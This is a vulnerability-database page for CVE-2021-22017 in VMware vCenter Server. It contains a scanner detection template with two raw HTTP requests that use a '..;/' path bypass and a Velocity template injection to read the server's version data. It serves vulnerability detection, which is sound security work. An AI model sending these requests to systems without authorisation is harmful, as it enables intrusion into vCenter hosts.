vCenter Server - Improper Access Control
CVE-2021-22017
Verified
Description
Rhttproxy as used in vCenter Server contains a vulnerability due to an improper implementation of URI normalization. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to bypass the proxy, leading to internal endpoints being accessed.
Severity
Medium
CVSS Score
5.3
Exploit Probability
75%
Affected Product
vcenter_server
Published Date
January 14, 2026
Template Author
daffainfo
CVE-2021-22017.yaml
```yaml
id: CVE-2021-22017

info:
  name: vCenter Server - Improper Access Control
  author: daffainfo
  severity: medium
  description: |
    Rhttproxy as used in vCenter Server contains a vulnerability due to improper implementation of URI normalization. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to bypass proxy leading to internal endpoints being accessed.
  impact: |
    Attackers can bypass proxy restrictions and access internal endpoints, potentially leading to information disclosure or further internal network compromise.
  remediation: |
    Apply the latest security patches or updates provided by VMware for vCenter Server.
  reference:
    - https://github.com/wangsir01/docs/blob/7c20bbf43ae467c1bdc54c65c9a3230ae3e81d63/CVE-2021-22017-22005%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E5%88%86%E6%9E%90/CVE-2021-22017-22005%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E5%88%86%E6%9E%90.md
    - https://www.vmware.com/security/advisories/VMSA-2021-0020.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22017
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-22017
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.74835
    epss-percentile: 0.98884
    cpe: cpe:2.3:a:vmware:vcenter_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: vmware
    product: vcenter_server
    shodan-query: VMware vCenter Server
  tags: cve,cve2021,vmware,vcenter,vkev,kev

flow: http(1) && http(2)

variables:
  plugintype: "{{randbase(8)}}"

http:
  - raw:
      - |
        POST /analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=vSphere.vapi.6_7&_i=9D36C850-1612-4EC4-B8DD-50BA239A25BB HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Deployment-Secret: secret
        X-Plugin-Type: {{plugintype}}

        {"manifestSpec": {"resourceId": "b1", "dataType": "b2", "objectId": "b3", "versionDataType": "b4", "versionObjectId": "b5"}, "objectType": "a1", "collectionTriggerDataNeeded": true, "deploymentDataNeeded": true, "resultNeeded": true, "signalCollectionCompleted": true, "localManifestPath": "a2", "localPayloadPath": "a3", "localObfuscationMapPath": "a4"}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 201'
          - 'len(body) == 0'
        condition: and
        internal: true

  - raw:
      - |
        POST /analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=vSphere.vapi.6_7&_i=9D36C850-1612-4EC4-B8DD-50BA239A25BB HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Deployment-Secret: secret
        X-Plugin-Type: {{plugintype}}

        {"manifestContent": "<manifest recommendedPageSize=\"500\">\n <request>\n <query name=\"vir:VCenter\">\n <constraint>\n <targetType>ServiceInstance</targetType>\n </constraint>\n <propertySpec>\n <propertyNames>content.about.instanceUuid</propertyNames>\n <propertyNames>content.about.osType</propertyNames>\n <propertyNames>content.about.build</propertyNames>\n <propertyNames>content.about.version</propertyNames>\n </propertySpec>\n </query>\n </request>\n <cdfMapping>\n <indepedentResultsMapping>\n <resultSetMappings>\n <entry>\n <key>vir:VCenter</key>\n <value>\n <value xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"resultSetMapping\">\n <resourceItemToJsonLdMapping>\n <forType>ServiceInstance</forType>\n <mappingCode><![CDATA[\n #set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())\n #set($objectId = \"vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid\")\n #set($obj = $LOCAL-cdf20Result.newObject(\"vim.ServiceInstance\", $objectId))\n $obj.addProperty(\"MSG\", \"exist\")\n $obj.addProperty(\"OSTYPE\", $content-about-osType)\n $obj.addProperty(\"BUILD\", $content-about-build)\n $obj.addProperty(\"VERSION\", $content-about-version)]]>\n </mappingCode>\n </resourceItemToJsonLdMapping>\n </value>\n </value>\n </entry>\n </resultSetMappings>\n </indepedentResultsMapping>\n </cdfMapping>\n <requestSchedules>\n <schedule interval=\"1h\">\n <queries>\n <query>vir:VCenter</query>\n </queries>\n </schedule>\n </requestSchedules>\n</manifest>", "contextData": "a2", "objectId": "a3"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'BUILD'
          - 'VERSION'
          - 'OSTYPE'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100dcd26a4e3d2ed6f6b7bd353a58091e00d5893cb48f233ead1bf2e30a102e33f402204df09e4cadb2ae33e3e11e6bb6b44594466c4292e2b795a6df8dd9ba3e650b72:922c64590222798bb761d5b6d8e72950
```
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
CVE-2021-22017
CWE ID:
NVD-CWE-noinfo
References
https://github.com/wangsir01/docs/blob/7c20bbf43ae467c1bdc54c65c9a3230ae3e81d63/CVE-2021-22017-22005%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E5%88%86%E6%9E%90/CVE-2021-22017-22005%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E5%88%86%E6%9E%90.md
https://www.vmware.com/security/advisories/VMSA-2021-0020.html
https://nvd.nist.gov/vuln/detail/CVE-2021-22017
Remediation Steps
Apply the latest security patches or updates provided by VMware for vCenter Server.